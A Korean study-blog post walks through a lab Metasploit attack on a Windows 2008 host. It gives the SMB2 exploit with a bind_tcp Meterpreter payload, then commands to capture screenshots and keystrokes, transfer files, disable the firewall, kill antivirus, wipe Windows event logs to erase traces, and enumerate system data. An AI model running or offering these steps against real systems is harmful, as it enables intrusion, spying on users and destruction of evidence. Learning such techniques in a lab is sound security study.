System Security DAY_016 meterpreter 스샷, meterpreter 키로거 , 미터프리터 , 미터프리터 정보수집 , 알약중지 시키기 , 방화벽 비활성화 시키기 , 스스크린샷 해킹 , Metaploit , BindTCP ,시스템 보안 , 시스..

2024. 1. 3. 23:33Information Security 정보보안/System Security 시스템 보안

728x90

meterpreter 스샷

meterpreter 키로거

미터프리터

미터프리터 정보수집

알약중지 시키기

방화벽 비활성화 시키기

스크린샷 해킹 

Metaploit

BindTCP  

시스템 보안

시스템 해킹

msfconsole 

 

 

 

 

 

 

 

 

제가 지금 부터 작성하는 모든글은 제가 공부기록용이기 때문에 정확하지 않을수 있음을 알려드립니다.

틀린게 있으면 댓글로 써주시면 고치겠습니다.

 

 

 

 

지난시간 

meterpreter 를 계속했고 이번시간에도 그럴것이다 

 

msfconsole 

미스포춘 부른뒤에 아래를 실행한다 

use exploit/windows/smb/ms09_050_smb2_negotiate_func_index
set payload windows/meterpreter/bind_tcp
set rhosts 192.168.10.245
exploit

 

 

이런식으로 지난번 연결한다 

 

아니면 

파일로 리딩 해도된다 

vi meta.rc 로 해서 위에 것 넣어주면 한번에 실행가능 
msfconsole -r meta.rc

 

 

 

 

그전에 meterpreter 가 뭔지 제대로 알자면 

"Meterpreter"는 Metasploit Framework 내에 있는 고급 페이로드(payload)이다 

Metasploit은 보안 전문가들이 네트워크의 보안 취약점을 발견하고

테스트하기 위해 사용하는 오픈 소스 도구인데 

 

Meterpreter는 메모리 내에서 직접 실행되며,

공격자가 원격 시스템에서 코드를 실행하고,

시스템 정보를 수집하고,

네트워크 연결을 조작하는 등의 다양한 기능을 제공한다 

 

그러나 악의적으로 이용될경우 법의 방망이 한대 맞을수있다 

 

 

 

 

 

 

자 아까 와같이 실행하면 

 

 

 

이런창에 오게 된다 이떄부터 우린 여러가지를 할수있다 

 

 

 

 

 

 

01. 스크린 샷 

 

 

현재 window2008 (공격할대상) 의 화면이다

 

 

 이제 kali에서 아까 meterpreter 에서 screenshot 을 입력해본다 

 

 

 

 

그럼뭔가 jpeg 로  사진이 저장되는데 그 사진을 열어보면 

 

 

 

캡쳐된걸 볼수있다

 

 

 

 

02. 스크린 공유 

 

 

 

이번엔 스크린 공유다 말그대로 스크린이 그대로 공유된다 

 

 

screenshare 하면  인터넷익스플로어 열리면서 거기서 공유가 된다 

 

 

 

 

 

03. 파일 업/다운로드 

 

upload file.txt

download file.txt

 

이건 말그대로 upload 하고 download를 해서 파일을

주고 받을수있다 

 

이건 간단하니 그냥 넘어가자 

 

 

 

 

 

04. 키로거 

 

 

run post/windows/capture/keylog_recoder 

 

를 실행해보자 

 

 

저 경로로 저장된다  시작한뒤에 window에서 아무렇게나 해보고 kali 돌아와서

ctrl+C 하면 종료되고 저장된다 

 

 

 

05. 방화벽 활성화 /비활성화

shell

한뒤에 

 netsh firewall set opmode mode=enable
(방화벽활성화)
 netsh firewall set opmode mode=disable
(방화벽 비활성화)

 

이렇게 둘중 골라서 할수있다 

설정하면 window2008에서 설정한것에 맞게 설정될것이다 

 

 

 

06. 알약 중지
meterpreter > run killav

 

혹시나 방화벽꺼도 안되면 알약도 중지시켜보자 

 

 

 

 

 

07. 로그 삭제

shell
wevtutil.exe cl "System"
wevtutil.exe cl "Application"
wevtutil.exe cl "Security"
wevtutil.exe cl "Setup" 

 

이렇게 하는데 이런게 어딧냐면 

 

 

컴퓨터 관리 > 시스템도구 > windows log > 에 보면 볼수있다 

여기에서 보면 응용프로그램의 log 기록이 있는걸 볼수있다

 

 

이젠 kali에서 

 

실행시키고 다시 window로 가보면 

 

 

 

 

 

 

깔끔하게 지워진걸 볼수있다

이걸로  해킹했던 기록을 지울수있다 

 

 

 


08 스크린 샷 (5초단위 6장)
meterpreter > run post/windows/gather/screen_spy

 

아까와 동일한 스샷이지만 그냥 여려장 찍는것이다 

 

 

 

 

 


09 정보수집

아까 로그를 지웠으면 이번엔 
meterpreter > run post/windows/gather/enum_applicationㄴ <-응용프로그램 
meterpreter > run post/windows/gather/enum_devices <- 장치정보
meterpreter > run post/windows/gather/enum_services <-서비스 
msterpreter > run post/windows/gather/usb_history <-usb 사용흔적 

 

 

 

이렇게해서 저장해주고

시스템에 설치된 응용 프로그램들의 목록을 수집

  시스템에 연결된 장치들의 정보를 수집

시스템에서 실행 중이거나 설치된 서비스들의 목록을 수집

USB 장치들의 사용 기록을 수집

등의

정보를 수집한다 

 

저장된 경로가 있으니 가서 열어보면 된다 

 

 

 

이러면 BIND_TCP의 끝이 났다 

 

이제 다음시간에는 reverse_TCP를 제대로 해보겠다

reverseTCP는 윈도우2008 도 윈도우10도 window2016 도 

작동한다 

 

그만큼 강력하다고 볼수있다 :) 그럼 다음시간에 보기로~ 그럼 20000~ 

 

 

 

728x90